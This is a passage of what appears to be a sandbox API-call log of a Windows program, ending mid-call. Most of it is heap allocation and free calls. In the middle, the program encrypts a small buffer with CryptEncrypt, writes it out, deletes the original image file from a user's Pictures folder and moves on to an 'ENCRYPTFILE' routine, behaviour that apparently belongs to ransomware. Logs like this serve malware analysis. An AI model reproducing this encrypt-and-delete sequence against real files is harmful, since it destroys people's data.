[0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.137] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.138] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.138] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0092.140] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.176] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x451, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x460) returned 1 [0092.177] CharLowerBuffW (in: lpsz="byte[1121]", cchLength=0xa | out: lpsz="byte[1121]") returned 0xa [0092.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.177] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43fd818*, pdwDataLen=0x144e538*=0x451, dwBufLen=0x460 | out: pbData=0x43fd818*, pdwDataLen=0x144e538*=0x460) returned 1 [0092.177] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.177] WriteFile (in: hFile=0x298, lpBuffer=0x43e8a88*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x43e8a88*, lpNumberOfBytesWritten=0x144ef3c*=0x460, lpOverlapped=0x0) returned 1 [0092.179] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0092.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0092.179] CryptDestroyKey (hKey=0x41abfc0) returned 1 [0092.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.180] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.180] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.180] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0092.180] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0092.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.180] FreeLibrary (hLibModule=0x756e0000) returned 1 [0092.180] CloseHandle (hObject=0x258) returned 1 [0092.180] CloseHandle (hObject=0x298) returned 1 [0092.181] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp", lpFilePart=0x0) returned 0x31 [0092.181] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\-3kptetzyngob.bmp")) returned 0x20 [0092.182] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeffcc610, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0x43e05300, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x43e05300, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="-3KPTEtzyngOb.bmp", cAlternateFileName="-3KPTE~1.BMP")) returned 0x41ac640 [0092.182] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\-3kptetzyngob.bmp")) returned 1 [0092.224] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeffcc610, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0x43e05300, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x43e05300, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="-3KPTEtzyngOb.bmp", cAlternateFileName="-3KPTE~1.BMP")) returned 0 [0092.224] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0092.224] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0092.224] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.225] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.225] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0092.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.225] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0092.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca028 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0092.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0092.227] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0092.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0092.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.227] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0092.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0092.227] FindFirstFileW (in: 